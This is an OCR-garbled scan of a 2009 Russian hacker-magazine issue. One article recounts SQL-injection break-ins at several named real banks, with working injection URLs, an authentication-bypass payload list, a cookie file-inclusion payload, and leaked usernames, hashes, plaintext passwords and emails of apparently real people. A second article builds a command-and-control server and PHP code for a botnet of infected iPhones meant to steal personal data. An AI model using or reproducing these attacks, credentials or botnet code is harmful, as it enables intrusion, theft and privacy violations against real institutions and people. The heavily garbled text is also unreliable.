зБаБеЬапк1898 . сот/пемз . азр?іс!= 
6+АББ+1 = 2+ШІСЖ+8ЕЕЕСТ+0 ,со1ит 
п_пате , 2 , 3 , 4 , 5 , 6+Бгош+іпБогтаБіоп_ 
зсБета . со1итпз+ШНЕКЕ+БаЫе_ 
пате=%27изегз%27 

Ответ базы: изегпате, раззѵѵогб, іб, М1_пате, 
ІюптщепгоІІтепІ:, іюггтщсопіасі:, етаіі, асБѵе. 
Остальные данные не особо важны. Кстати, как 
видишь, параметр с базой я отбросил, потому 
что мы и так находились в этой базе. Одним 
запросом я заполучил все интересующее из 
таблицы пользователей: 

зБаБеЬапк1898 . сот/пемз . азр?іс!=6+АМ 
Б+ 1=2 +ІШІСЖ+8ЕЕЕСТ+ 0 , сопсаБ (изегпа 
те , 0x2 0 , раззѵгогсі , %2 0 ісЗ. , 0x2 0 , Биі 1_ 
пате , 0x2 0 , Богт_епго11тепБ , 0x2 0 , Богт_ 
сопБасБ , 0x20 , етаіі , 0x20 , асБіѵе) ,2,3, 
4,5, 6+Бгот+изегз 

Результатом взлома являлось: 



Ответбазы — «зЫБарругибіе». Что в конечном 
итоге я и подставил в следующий запрос, с целью 
выведать, какиетаблицы находились в базе: 





епгоІІтепБ тѵгмББитѵІ 6 Опііпе 

ЕпгоІІтепБ 1 0 Визіпезз . Опііпе© 

8БаБеВапк1898 . сот 0 

кмѵ I ік | 5 СопБасБ Бз 0 1 БеБТе11ег@ 

зБаБеЬапк1898 . сот 0 

асітіп Одббті [из{9@А@4 Асітіп 0 0 

б ІоББОдіЬЬез . пеБ 1 

И еще кое-что, что в опубликованном виде вряд 
ли бы понравилось С Б этого банка. Оставим 
коммерческиетайны за кадром. 

в ЦЕЛЬ; ІІЫІВАЫКНАІТІ.СОМ 
(ФРАНЦИЯ) 

Этот странный франкоязычный банк, прикры- 
вающийся законами Гаити — моя криминальная 
мечта. Шутка. Ситуация тут аналогичная, только 
вотни один запрос, даже простейший, не ис- 
полнялся нужным мне образом. Дело втом, что 
разработчиками системы была задумана идея 
шифрования данных, хранящихся в таблицах. 

ипіЪапкБаіБі . сот/асВиаІіБез/іпсІех. 
рЬр ? ісі_аг Б іс 1 е= 4 6 4 +АЫВ+ 1 = 2 +ІМІСЖ+ 8Е 
БЕСТ+0 , ССЖСАТ ( 0 х 7873716С696Е6А6265 
67696Е, (8ЕБЕСТ+С(ЖСАТ_мз (0хЗаЗа,%20 
Б аЫ е_пате , ѵегзіоп ( ) ) +ЕКОМ+іпБогтаБі 
оп_зсБета.БаЫез) , 0 х 7 873716С696Е6А65 
6Е64) ,0x71) ,0x71) , 2, 3,4, 5, 6, 7,8,9- 

Теже самые шаги по разведке колонок про- 
делывать не было смысла, поэтому — сразу 
результат, который был получен за 5 минут: 

База: ипіЪап2_ВВ 
[ТаЫе: Соіитпз] 

[ 0 ] зБаБізБідиез : ісі, изегпате , Буре_а 
сБіоп , сІаБе , Беиге , раде , ір , БюзБ , паѵі 
даБеиг , геБегег 

[1] зиссигзаіез : ісі, зБаБиБ ,пот,сіезс 
гірБіоп , асігеззе , сІігесВеиг , БеІерБоп 
е, Бах,гезеаи, іпаидигаБіоп,Богаіге, 
зегѵісез 

[2 ] БаББісЬез : 

ІБ, зоигсе, 1іеп,с1еЬиБ , Біп,р1асе 
[3 ] Бадепсез : ісі, зБаБиБ , пот, сіезсгірБ 
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ПРИМЕРНО ТАК МОЖЕТ ВЫГЛЯДЕТЬ ПРОЦЕССИНГ 
ИЛИ ТРАДИЦИОННЫЙ ЕМРЮѴЕР’ І.06Ш. ЭТОТ ІР МЫ : 
ВЫУДИЛИ ИЗ БАЗЫ ДАННЫХ ПОСЛЕ ПРОВЕДЕНИЯ Г 
50С-ШЭЕСТІ0Ы 



ПОРОЙ ДОГАДАТЫ 1 ОБ УСПЕШНОСТИ ПОДБОРА КО- 
10Н0К ТРУДНО, ОСОБЕННО, ЕСЛИ ТЫ ОБРА ЩАЕШЬ 
ІВНИМАНИЕ НА ВНЕШНИЙ ВИД САЙТ/ 



іоп, асігеззе , сіігесіеиг , Іеіерііопе , іах, гезеаи , іпаидигаііо 
п,іюгаіге , зегѵісез 

[4] Іаппопсез : аппопсеІБ, ішаде, Іііге , ІіЬеІІе , сіаіе , роз 
1е_раг , асііі 

[ 5 ] Іазсіисез : АзСисеІБ , Іііге , ассгосЬе , сопіепи ,то<Зі:Е:і 

е_раг ,тосіі^іе_1е , асііі 

[6] Ісаііад: Іс1_са1 , саіедогіе 

[7 ] Іетріоі : І<3_аг1іс1е , ішаде , сіаіе , Іііге , ассгосАе , сопіе 
тщехрігсіаіе, есгііраг , розіераг , асііі 
[8] Над: і<3_іад, і<3_са! , диезі іоп, геропзе 
[ 9 ] Іпемз : І3._аг1іс1е , ішаде , сіаіе , Іііге , ассгосЬе , сопіепи 
, ехрігсіаіе , есгііраг , розіераг , асііі 

[ 10 ] Ізиссигзаіез : ісі, зіаіиі , пош, сіезсгірііоп , асігеззе , сі 



Рго5 & Сапа б использовании 
автоматизированных средств 
для ЗОІ.-іігіес'Ноп 

В статье я не прибегал кавтоматизированным средствам, и тому есть 
ряд объективных причин. Работа ручками упражняеттвои знания, 
и еще ты сам являешься гарантом всего, что делается. Косяк5СН_ 
Іщесбоп Репіюзбпд Тооі (51 РТ) заключается втом, что когда хочешь 
получить сп исоктабл и ц или данные из табл и цы при включенной 
галке ЫМІТ доданные возвращаться не будут. Если эту опцию снять 
— все работает правильно. По словам разработчика 50І_НАСК, это 
его недоделка. 

і 




ЧЕТЫРЕ ОСНОВНЫХ ПОЛЬЗОВАТЕЛЯ В СИСТЕМЕ УП-І 
РАВЛ ЕНИЯ БАНКА. У НАС ЕСТЬ ЧЕЛОВЕК ИЗ ОТДЕЛА 
ПРАВЛЕНИЯ ПЛАТЕЖАМИ (ОЫЫЫЕ ЕЫРОИМЕМТ), 
^ТО-ТО ВРОДЕ СЕКР ЕТАРЯ И АДМИНИСТРАТОР 

-—■и, - ° 




ПОДОБНАЯ АВТОРИЗАЦИЯ НЕ ВЕДЕТ НИ К ЧЕМУ 
ХОРОШЕМУ Г 



ігесСеиг , ІеІерЬопе , іах, гезеаи , іпаидига1іоп,1югаіге , зе 
гѵісез 

[11] ССаих: ісі, сіаіе , асііаі , ѵеп1е,ЪгЪ. 

[12 ] иіііізаіеигз : І<3_и1і1іза1еиг , 1од,разз , сігоіСз , ассез ! 

Мои познания французского — нулевые, но, прибегнув к помощи 
онлайн-переводчика, я сразу понял, какая таблица и какие колонки мне 
требуются (смотри 12]. 

[0] ІішапіСои: 1681247 83 66і92М3 85сі8Ъ611152ес7 4 : 777 7777 
: іпсіех . рАр : 

[1] 2 : пеѵузшазСег : 9са4377 12 07 8 61а0сісі00956ЬЬ503а95а : 7777 
7 7 : аЗтіп_пемз . рЬр : 

[2] 3 ггаіетазіег :<3сі8 154с23ее127 99714(367 1е7е110е1Ъ: 0003 
0 0 : аЗтіп_зисс . рЬр : 

[3] 4 ггаСетазСег :сісі8 І54с23ее127 997 14сіб7 1е7е1і0е1Ь: 0007 
0 0 : аЗтіп_зисс . рЬр : 

[4] 5 : гезеаи :117Ьа14 1847 1е7ес247ЬЬ0і7112еЬЬаі: 001100 :і 
псіех . рЬр : 



Рапдоііп 

Китайская хиромантия, в 90% случаев определяюща- 
яся как пасс-граббер. На самом же деле, это почти универсальная 
утилита для эксплойтинга ЗОЫщесбоп сразу в ряде баз (Му5СН_, 
М55СІІ_, Огасіе, ЗуЬазе, 0В2, Ассезз, I піогтіх, Роз1:дге5С11_, ЗОЫіе] . 
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ПЕРЕД НАМИ «СНАМВЕР’5 ВДЫК». ХАЛАТНОСТЬ 
ПРИ ПРОЕКТИРОВАНИИ ОТКРЫЛАВОЗМОЖНОСТЬ 
ЗЛОУМЫШЛЕННИКУ ПРОВЕСТИ 50ЫШЕСТІ0М, А 
ТАКЖЕ НАЙТИ СРЕДСТВА УПРАВЛЕНИЯ, ОСТАВЛЕН- 
|НЫ Е АДМИНИСТРАТОРОМ Ігі, 



ПЫТАЕМСЯ РЕАЛИЗОВАТЬ 
«АІІТНОРІ2АТІОМ ВѴРА55» 



[5] б : гезеаиі : сЪ4ЪЪсс34Ъ4Ъ47 894а0еб(3 
Ь7 0 б кЪ4 15с2 : 007700 : іпсіех . рЬр : 

[6] 12 :сЗгМ : 841еЬ9773 00а2с384аЬ2сск8к 
9077к1е0 : 000007 : іпсіех . рЬр : іпсЗех.рЬр: 

в ЦЕЛЬ ТВСВАЫК.СОМ.ОЕ 
(ГРУЗИЯ) 

Солидный грузинский банк! Давно привлекмое 
внимание, потому что однажды, когда я прогля- 
дывал логи друга, беседуя на тему информацион- 
ной безопасности банковского сектора, мне стало 
очевидно, чтоданныеавторизации пользователя 
передаются в незашифрованном виде: 

кЬсЬапк. сот. де/іг/ 
шаіп . р!ір?1апд=епд&і(3=- 
80&аскіоп=1&ипате=а1ехапсЗег . 
к!іа2ага(32е%40зкакезкгеек . 
сош&иразз=хкодта&0К=Ьодіп 

Соответственно, Іодіп:АІехапбег.кЬагасІ 2 е(сІ 
зіаіезіхеексопп, а пароль — хкодта. 

Было бы удивительно, если мы каким-нибудь 
другим образом вторглись и в этот банк. 

кЬсЬапк . сот. де/ іг/шаіп . р!ір?ісЗ=2 0+А 
МБ+1=2+ІЖІОМ+ЗЕБЕСТ+0 ,1,2,3- 
кЬсЬапк . сот. де/ іг/таіп . р!ір?ісЗ=2 0+А 
N3+1=2 +ШГІОМ+ЗЕЪЕСТ+0 , сопсак_мз (к_ 
изег , 0x2 0 , к_разз ) , 2 , 3+кгот+к_изегз 

Сразу получаем данные на админа 
(абтіп:Ьибіапбик>) из 1_изегг и бежим в ад- 
минку « іЬсЬапк.сот.де/іг/абтіп/іпбех.рбр » . 
Остальные пользователи таблицы (:_изегз: 



Магкіп : ЕапкЬаизег : Акіапкіс 

Еогкаікіегипдз АС : Окктагзкгаззе 

8:8008 ЕигісЬ. : БоВакаІпСоІи 

тп: ЗмікгегІапсЗ: капккаизег® 

акіапкіскогкаікіпд . сот: 

разз: акіапкіс 

Сіогді : КекеІісЗге : ТВС 

Вапк : Маг з апізкѵііі 7 : кЬіІізі : 0102 

: Сеогдіа : дкекеІісЗгеОкЬсЪапк . сот. 

де: +99532272727 : +99532 774772 : 

разз: Юіо(0000 

Татаг : Катізкѵііі : ТВС : 0102:БоВак 
аІпСоІитп : Сео : кгатіз!іѵі1і@дтаі1 . 
сот : ккз 1<і : кирі : 

Разз : кака 

в ЦЕЛЬ: ОАБРЬА.СОМ 
(МЕЖДУНАРОДНЫЙ) 

По сути, один из лидеров в сфере АТМ-процес- 
син га. Тестируем главную форму авторизации 
на предмет «аиіЬогігаІіоп Ьѵразз»: сІазНа.сот/ 
[одіпзсг.азрх . 

Авторизируемся сданными: 

Бзегпате: асЗтіп' ог 1=1-- 
РаззѵсгагсЗ: асЗтіп' ог 1 = 1- 

Бинго! ѴѴеаге іп! Перед глазами заветное: 
«Оаіа Ассезз Бузует з, Іпс. ІІзег: 5ирег 
Асітіпізігаіог». 

* ЦЕЛЫ АВСОЕСАВАИСА. 
СОМ (ИСПАНИЯ) 

Может быть, здесь все будеттакже просто? 

ііккр : / /тт. аЬсйеІаЬапса . сот/асітіп/ 
радез / кгт_1одіп . ркр 

Авторизируемся сданными: 

изег: х' АБВ етаіі 13 ШББ; -- 
разз : х' АБВ етаіі 13 ЫІЛЗЬ; -- 

Порядочек! Как же та к выходит? 



Вот, в дар отменя, подборка специальных вы- 
ражений, которые могут быть очень кстати при 
проведении атак та ко го рода: 



ог ' 1 ' = ' 1 ' ог ' 1 ' = ' 1 ' , 
'ог'1'='1'ог'1'='1 
' ог ' ' = ' 

' ог ' ' = ' 

асЗтіп" ог "а" = " а 
асЗтіп" ог 1=1 - 
асЗтіп ' ог 1=1 - 
асЗтіп' ог 'а , = , а 
асЗтіп '} ог ( ' а ' = ' а 
асЗтіп") ог ( " а " = " а 
а=1 ) -- 
асЗтіп ' -- 
* ог 0 = 0 -- 
ог 0=0 -- 
ог 0=0 -- 
ог 0 = 0 # 
ог 0 = 0 # 
ог 0 = 0 # 

ОГ ' х ' = ' X 

ОГ " X " = " X 
) ОГ ( ' X ' = ' X 

ог 1=1-- 
ог 1=1— 
ог 1=1-- 
ог а=а— 
ог "а"="а 
) ог ( ' а ' = ' а 
) ог ( " а " = " а 
Ь.і " ог " а" = " а 
пі " ог 1=1 -- 
Ь.і ' ог 1=1 -- 
Ъ.і ' ог ' а ' = ' а 
Ъ.і ' ) ог ( 1 а ' = ' а 
Ьі" ) ог ( " а " = " а 



в ЦЕЛЬ: РШѴАТВАЫК.иА 
(УКРАИНА) 

При заходе на ЫірзѴ/Ыод.ргіѵаіЬапк.иа/ 
ІіЬ/гедиезі/сЬоісе о^ дообз.рбр получаем 
Ошибку: 
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НЕКОТОРЫЕ СПОСОБЫ РЕАЛИЗАЦИИ «АЦТН0КІ2АТІ0ІЧ ВУР А55» 
ПРИВОДЯТ К РАС КРЫТИЮ ТАБЛ ИЦ 
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ОРГАНИЗУЕМ І.РІ В С00К1Е 



ь. 



ги; гѵ:1.9.0.8) Сеско/2 009032 609 Рігебох/3 . О . 8 ] 

Ассерб [бехб/Ьбші , арріісабіоп/хЬбтІ+хтІ , арріісабіоп/ 
хші ; д= 0.9,*/*; д= 0.8] 

Ассерб -Ьапдиаде [ги, еп-из ; д=0 . 7 , еп; д=0 . 3 ] 

Ассерб -Епсобіпд [дзір , бебіабе] 

Ассерб -СЬагзеб [міпботлз-12 51 , ибб-8 ; д=0 . 7 , * ; д=0 . 7 ] 
Кеер-АІіѵе [300 ] 

Соппесбіоп [кеер-аііѵе] 

Соокіе [ 1апдиаде= ../ . /ебс/раззмб%00 ] 
СасЬе-СопбгоІ [тах-аде=0] 

Соответственно, изменяя данные в куке, можно пробручивать доступ- 
ность бага І_РІ к другим важным файлам, например, ЫірсІ.сопіѴ рЬр.іпі. 
После чего одобрительно отмечаем будущие полученные запросы. 
Далее мое внимание привлекло наличие на сайте линка суказанием 
какого-то нестандартного порта: 









Ошибка синтаксического анализа ХМЬ: лишние данные после 
элемента документа 

Адрес : Ьббрз : //Ыод . ргіѵабЬапк . иа/1іЬ/гедиезб/сбюісе_ 
об_дообз . рЬр 

Строка 2, символ 1:<баЫе с1азз= "дообз " се11зрасіпд= " 0 " 
се11раббіпд= " 5 " Ьогбег="0"> 

При применении анализатора НТТР-протокола (я использовал Татрег 
Оаіа] можноувидеть, что сайт ставит кукс параметром «[апдиаде». Про- 
веряем возможность І_РІ в соокіе: 

# приготавливаем злонамеренное значение соокіе 
1апдиаде= /ебс/раззтлб%00 

# далее подставляем его с помощью любого инжектора пакетов 

Описанная процедура сТатрег Оаіа , выглядитпримернотак. Открыва- 
ем: «Могіііа -> Инструменты Перехват данных Запустить перехват 
Открываем наш сайт Вмешаться в запрос-^ Редактируем куки 
Отправить». Наряду сэтой простой процедурой понимаем, что сгенери- 
ровавшийся запрос выглядит, как: 



Ьббр: / /тлллпл . ргіѵабЬапк . иа : 8085/іпбо/іпбехЗ . збт 

Если обратиться строго по порту, то нам будут доступны для чтения до- 
кументации по«ЕА5егѵег5.5 Реіеазе». Между прочим, насчет этого все 
известные багтраки кидаютадвайзори: 

«А ѵиІпегаЬіІібу Ьаз Ьееп бізсоѵегеб іп ЗуЬазе ЕАЗегѵег. 
Іб ехріоібеб, 

бЬіз сап гезиіб іп изег-зресібіеб собе Ьеіпд ехесибеб 
ипбег бЬе зесигібу сопбехб об бЬе 

задзгѵ.ехе ргосезз. То сошріебе бЬіз аббаск, уои шизб Ье 
аибЬепбісабеб 

бо /МеЬСопзоІе/ . Ву бебаиіб, бЬе задабтіп изег раззѵлэгб 
із зеб бо Ыапк зо деббіпд ассезз 

тідЬб Ье бгіѵіаі . Аббег аибЬепбісабіпд бо /ШеЬСопзоіе/ 
іб ап аббаскег зебз бЬе ѵаіие об 

бЬе баѵаЗсгірб рагашебег іп ТгееАсбіоп . бо бо а Іагде 
ѵаіие а гебигп аббгезз сап Ье 

оѵегѵлгіббеп бие бо а збаск-Ьазеб Ьиббег оѵегбіочл» 



Нозб [Ыод.ргіѵабЬапк.иа] 

бзег-Адепб [МозіІіа/5 . 0 (Ѵ7іпбомз ; б; Міпбомз Ж 1 5 . 1 ; 



Действительно, «Аиібогігабоп Ьура55»слогином]адабтіп и пустым 
паролем прокатил ц-ц 
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ПОКУПАЙ ІИВІ5 НА! 




ѵѵѵѵчѵ.ігЫ&РС .ги 
ѵ«мі<.к-$у5»етз 



ЦЕНТР РАСПРОДАЖ: 

(м) Савеловская 
уд. Башиловская, дом 1 
тел.: (495) 721-38-54, 
моб.: 8 (903) 175-23-39 



В ЛУЧШИХ МАГАЗИНАХ ЭЛЕКТРОНИКИ 



а в ЦЕНТРЕ 

РАСПРОДАЖ 

компьютеры ІКВІ5 




ТЕХНИКА УСПЕХА 





Пройдетеще летпять, итекущие гигабитные скорости мы будем счи- 
тать бесконечно малыми.ПомимоЭЗМиЗд, современные телефоны 
имеютѴѴі-Рі адаптеры, так что практически постоянно находятся в он- 
лайне. Век мобильных ботнетов уже настал. В этой статье я расскажу 
о практической реализации сервера для управления сетью мобиль- 
ных зомби-телефонов, в частности для Арріе іРЬопе. 



к МОБИЛЬНАЯ СПЕЦИФИКА 

Перед началом работы разберем особеннос- 
ти мобильныхзомби — чем они отличаются 
и какие преимущества дают по сравнению с 
«классическими» зараженными машинами. 
Вот список основных фич: 

1. Быстро меняющийся ІР-адрес (который, 
скорее всего, больше не повторится]. 

2 . Невысокая скорость соединения (в среднем, 
менее 1 Мбит/с]. 

3. Возможность получения команд по сети С5М 
без интернета (например, средствами 5М5]. 

4 . Практически полное отсутствие антивирус- 
ных и антишпионских средств. 

5 . Нет контроля трафика владельцем. 

6. Высокая вероятность хранения в телефоне 
личных данных (номера кредиток, пин-коды, 
счета, адреса и п р.) . 

7 . Звонки и отправка 5М5. 

8. Определение местоположения по 05М или 



0Р5 (если втелефоне есть такой контроллер). 
Э.Запускпрограммы диктофона в скрытом 
режиме (в качестве подслушивающего уст- 
ройства]. 

Использовать все эти особенности вместе было 
бы, конечно, здорово, но меня натакой подвигне 
тянет. Ограничусьосновными, а остальные пой- 
дут какдоработки. Также не исключаю, что мой 
списокможно пополнить еще десятком позиций. 

в КАК ЭТО БУДЕТ РАБОТАТЬ 

Мы напишем серверную часть с админкой для 
публикации командна веб-сервере. Клиенты 
(то есть, зараженныетелефоны] посредством 
самого трояна будут скачивать наши команды 
через определенные интервалы времени и 
исполнять их. Результаты исполнения клиенты 
опять-таки будут передавать нашему серверу 
через НТТР. Это хозяйство можно реализовать 
на чем угодно. В статье я опишу все для РНР и 



ЗОБіІе под ѴѴі псіоѵѵз. Разумеется, не составит 
труда перенести код под любую другую среду. 
Замечу, что я специально оставил в коде 5СИ- 
инъекции, чтобы ни у кого не закралась мысль 
использовать этот пример для причинения 
вреда чему-то живому. 

в ИДЕНТИФИКАЦИЯ 
ТЕЛЕФОНОВ 
И РЕГИСТРАЦИОННЫЕ 
ДАННЫЕ 

Если компьютеры в ботнете обычно иден- 
тифицируют по ІР-адресам, то телефоны мы 
будем определять по ІМЕІ —уникальному 
коду, зашитому на заводе. Это тот самый код, 
что может служить доказательством кражи в 
суде. По ІМЕІ можно найти пропавший телефон 
через соответствующие органы, а они, в свою 
очередь, найдутего местоположение через со- 
тового оператора. Сменить ІМЕІ на конкретном 



► 056 



ХАКЕР 05 /125/ 09 




СПЕЦИАЛЬНАЯ КОМАНДА — УНИКАЛЬНАДЛЯ БРОДКАСТ КОМАНДА ЕЕ ВЫПОЛНЯТ ВСЕ 

КАЖДОГО ТЕЛЕФОНА. МОЖЕТ ЗАСТАВИТЬ ПЕРЕ- УСТРОЙСТВА 

ДАТЬ ЛИЧНЫЕ ДАННЫЕ 



4 



телефоне считается довольно проблематич- 
ным (зависит от производителя и модели]. По 
смене ІМЕІ на іРЬопе есть полная и подробная 
инструкция (а главное — простая): 

ѵлллл. ісіагіііей. сот/епЬгу/іпйех . 
ркр?епій=657 . 

Тем не менее, с очень большой вероятностью 
ІМЕІ будет нашим уникальным идентифи- 
катором зомби. Давай прикинем, какие 
дополнительные данные нам потребуются от 
зараженного образца. Во-первых, обычный 
телефонный номер вида +7-( 1 231-456-78-90. 

Он пригодится для отправки 5М5 и специаль- 
ных сервисов ОПСОСа, а-ля переброс денег 
на другой счет или подключение услуг. Сюда 
же я предлагаю добавить дату регистрации 
зомби на мастер-сервере (датузаражения) 
и дату последней активности (дату ответа на 
последнюю команду]. Для красоты заведем 
еще, опционально, текстовый алиасаппарата и 
килобайтный комментарий. Таким образом, мы 
сможем записать информацию о каждом зомби, 
придумыватьсмешные названия и прочую фиг- 
ню, если вдруг понадобится. Также потребуется 
хранить сами команды, которые будут получать 
и исполнять наши зомби — я предусматри- 
ваю общие (бродкаст] для всех зараженных 
и специальные (директ] команды для конк- 
ретного телефона. Все эту информацию надо 
где-то хранить, и вероятно, не на бумажке под 
половицей. Поэтомузаведем соответствующие 
таблички в базе данных. Я использую БОЕіІе, 
хотя все написанное без труда можно перело- 
жить под любую другую СУБД (на этот счет еще 
будет несколько комментариев потексту]. 

в УСТАНАВЛИВАЕМ СУБД, 
СОЗДАЕМ ТАБЛИЦЫ 

Вся прелесть (и одновременно, недостаток] 
БОЕБе заключается втом, что сама база 
представляет собой всего-навсего один файл. 
Интеграция с языками программирования 
тоже очень простая. Я буду писать под РНР и 
ѴѴіпбоѵѵз. В моем случае для установки СУБД 
следует добавить в рбр.іпі следующие строчки: 

[РНР_30ЫТЕ] 
ехЬепзіоп=р1ір_рйо . сЗ.11 
ехЬепзіоп=р1ір_рйо_зд1іЬе . сЗ.11 
ехЬепзіоп=р1ір_зд1іЬе . <311 



После этого скачиваем объявленные библио- 
теки в директорию ехі: и наслаждаемся. Теперь 
создаем таблицы, куда будем записывать 
поступающую отзомби информацию и новые 
указания. Воттак выглядитЗОЕ-скрипт: 

СКЕАТЕ ТАВЬЕ зошЫез (Ій ШТЕСЕК 
РКІМАКУ КЕУ , ішеі ШТЕСЕК, питЬег 
ШТЕС 

ЕК, іпіесЬ_йаЬе ВАТЕТІМЕ # 1азЬ_ 
асЬіѵе_йаЬе БАТЕТІМЕ, аііаз 
ѴАКСНАК (64) , сошшепЕ ѴАКСНАК ( 

1024) ) ; 

//В этой таблице хранятся записи о 
зараженных телефонах. 

СКЕАТЕ ТАВЬЕ сошшапйз (Ій ШТЕСЕК 
РКІМАКУ КЕУ, сшй ѴСНАК (12 8) , сгеаЬей 
БАТЕТІМЕ, ассерЬей ШТЕСЕК) ; 
//Таблица служит для записи команд, 
которые получают все зараженные 
(бродкаст) . 

СКЕАТЕ ТАВЬЕ зрес_сошшапйз 
(ій ШТЕСЕК РКІМАКУ КЕУ, сшй 
ѴАКСНАК (12 8) , ішеі ШТЕСЕК, сгеаЬей 
БАТЕТІМЕ, ассерЬей ШТЕСЕК) ; 

//Здесь хранятся команды, адресо- 
ванные конкретному исполнителю по 
его ІМЕІ . 

Отмечу, что, например, для МуБОЕ 1 5 цифр 
ІМЕІ не влезутв ІЫТЕОЕР.такчтоЗОБпридется 
немного исправить. Покончив с настройкой 
базы, перейдем непосредственно к написанию 
скрипта, который будет регистрировать в базе 
новыхжертв. 

в «ПОМОГУ 
С РЕГИСТРАЦИЕЙ», 

ИЛИ ЗАПИСЫВАЕМ ЗОМБИ 

После заражения телефон отправляет ННр-за- 
проссОЕТ-параметром ІМЕІ и кодом регистра- 
ции. Код нужен, чтобы убедиться, что регист- 
рацию проходитименно наштроян, а недядя в 
фуражке. Крутые перцы пишуттяжелые матема- 
тические функции для свертки регистрационных 
данных в верификационный код, а для наших 
тестовых целей хватит и чего-нибудь попроще. 
Например, возьмем выборочные цифры из ІМЕІ, 
умножим на константы и сложим результат вмес- 
те. Выйдетнеоченькрасиво, но весьма наглядно. 
Таким образом, пишем первую функцию для 
проверки регистрационного ключа: 



ІипсЬіоп сЬескѴкеу ( $ішеі , $ѵкеу) 

{ 

$гезиІЬ = іаізе; 

іі ( збгіеп ( $ішеі ) ==15 ) 

{ 

$сЫ = $ітеі [3 ] ; 

$сЪ2 = $ітеі [7 ] ; 

$сЪЗ = $ітеі [8] ; 

$сЪ4 = $ітеі [11] ; 

$сЪ5 = $ітеі[13]; 

$Ькеу = ( $сЫ*101 + $сЪ2*107 + $сЪЗ* 
3 + $сЪ4*9 + $сЪ5*71 ) ; 

ІЙ' ( $Ькеу= = $ѵкеу ) 

{ 

$гезиІЬ=Ьгие; 

} 

} 

геЬигп $гезиІЬ; 

} 

После проверки ключа добавляем гаври- 
ка в базу. Для этого используем функцию 
асИТо2отЬіе: 

ІипсЬіоп аййТоЕотЫе ( $ітеі , 

$ питЬе г) 

{ 

іі ( збгіеп ( $ітеі ) ==15 ) 

{ 

кгу { 

$йЬНапй1е = пе^ ЗОЬіЬеБаЬаЬазе ( 
"тазЬег-зегѵег . йЬ" ) ; 
іі (збгіеп ( $питЬег ) ==0 ) 

$ питЬе г = "ШЬЬ" ; 
@$йЬНапй1е->диегуЕхес ( 

" іпзегЬ іпЬо зошЬіез 
ѵаіиез ( ( зеіесб тах ( ій) +1 ігот 
зотЫез) , " . $ітеі. ", ". $питЬег. " , 
БАТЕТІМЕ ( 1 поѵ^ 1 ) , ШЬЬ , 
геЬигп Ьгие; 

} 

саЬс]т( ЕхсерЬіоп $ехсерЬіоп ) 

{ 

Йіе ( $ехсерЫоп->деЬМеззаде ( ) ) ; 
геЬигп іаізе; 

} 

} 

} 

Обе эти функции и простую логику проверки 
собираем вместе в файл гед.рбр. Для коррект- 
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СПИСОКЗАРАЖЕННЫХ МАШИН. ГЛАВНОЕ ОКНО 
ИНТЕРФЕЙСА 



ТИПИЧНЫЕ ПРЕДСТАВИТЕЛИ ЗОМБИ. ПОВЕРЬ, 
ІРНОЫЕУ НИХ В КАРМАНАХ 



ной работы троян при регистрации должен послать нам ЫТр-запрос 
примерно с та ким ННІ_: 

ТШСр : //тазіег-зегѵег . сош/гед .р!ір?ішеі=12345б789012345 
&ѵкеу=1589 . 

в РАЗДАЕМ КОМАНДЫ 

Осталось написать командую часть. Логика здесь простая: лезем в 
базу, тащим самую свежую команду (с большим Ю) и печатаем в НТТР 
гезропзе. При этом еще надо обновить табличкуготЬіез.установивтам 
дату последней активности зомби, забравшего команду, равную текущей 
дате. Функции будут выглядеть так: 

іипскіоп зкоѵ^Сошшапсі ( ) 

{ 

Сгу 

{ 

$сІЪНапсі1е = пем ЗОЬіЦеБаСаЬазе («"шазСег-зегѵег . ЛЬ" ) ; 

$зд1СекѴіетлг = "ЗЕЬЕСТ * ЕКОМ сошшапсіз ШЬеге ісі іп 
( зеІесС шах ( ісі) ігош сошшапсіз )" ; 

$гезиШ = $с!ЬНапс11е->диегу ( $зд10екѴіеш) ; 

$радеѴіетлг = $гезиШ->ПеЦс]т ( ) ; 

есТю $радеѴіем [ 1 ] ; 

} 

саксЪ. ( ЕхсерСіоп $ехсерСіоп ) 

{ 

сііе ( $ехсеркіоп->декМеззаде ( ) ) ; 

} 

} 

іипскіоп ирсіаЦеАсЦіѵіСу ( $ішеі) 

{ 

Сгу 

{ 

$сіЬНапс11е = п еѵг ЗОЬіЦеБаСаЬазе («шазСег-зегѵег . <ЗЬ" ) ; 

$зд1СеСѴіехѵ = "ТЗРБАТЕ гошЬіез ЗЕТ 1азД_аскіѵе_ 
ЛаЦе=БАТЕТІМЕ ( 'поѵЩ ) ШНЕКЕ ішеі=" . $ішеі; 

$гезиШ = $сіЬНап(і1е->диегу ( $зд1Сеі.Ѵіеш) ; 

} 

саксЪ. ( ЕхсерСіоп $ехсеркіоп ) 



{ 

сііе ( $ехсерЦіоп->деСМеззаде ( ) ) ; 

} 

} 

Соответственно, чтобы забрать команду, троян тянет страничку вида: 

ЪЩЦр : //шазСег-зегѵег . сош/Саке . ркр? 
ішеі= 12 345 67 89 012 34 5 . 

Чтобы иметь возможность общаться с конкретным телефоном, напи- 
шем функцию для вывода команды из таблицы зресіа[_соттапбз по 
конкретному ІМЕІ: 

іипсСіоп зЬомЗресСогпшапсі ($ішеі) 

{ 

Сгу 

{ 

$с!ЪНапс11е = петлг ЗОЬікеВакаЬазе ( "шазкег-зегѵег . сПэ" ) ; 

$зд1СеСѴіеѵ^ = " ЗЕЬЕСТ * ЕКОМ зрес_согатапсіз ѵіЬеге ісі іп 
( зеіеск шах ( ісі) ігот зрес_соттапсіз ѵібеге ітеі= " . $ітеі . " ) с ; 

$гезиШ = $сіЪНапс!1е->диегу ( $зд1СеСѴіеѵЛ ; 

$радеѴіем = $гезиІЦ->іексЬ ( ) ; 

есТю $радеѴіеѵЩ1] ; 

} 

саксЬ( Ехсеркіоп $ехсеркіоп ) 

{ 

сііе ( $ехсеркіоп->декМеззаде ( ) ) ; 

} 

} 

Ну вот, все готово. Можно начинать проверять работоспособность 
движка, так какбазовый функционал готов. Правда, мы несделали себе 
возможностьзаписыватьэти самые команды в базу. Тут есть два вари- 
анта — либо пользоваться консольной утилитой зціііе.ехе, либо потра- 
тить еще 1 5 минут и дописать веб-интерфейс. Ты какхочешь, а я пойду 
по второму пути, потому что он сэкономит потом пару часов на пиво :). 

в ДАЙТЕ ПОРУЛИТЬ, 

ИЛИ ПИШЕМ АДМИНКУ 

Первым делом выведем список всех зомби в НТМ 1-табличке. 

Для наглядности, телефоны, которые приняли после регистрации 
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КАРТА МИРА КОМПЬЮТЕРНЫХ БОТНЕТОВ 

хотя бы одну команду (заполнено поле Іа5І_асііѵе_ 
сЫе таблицы готбіез], подсветим зеленым, осталь- 
ные — красным. Здесьже пишем простой жаваскрипт 
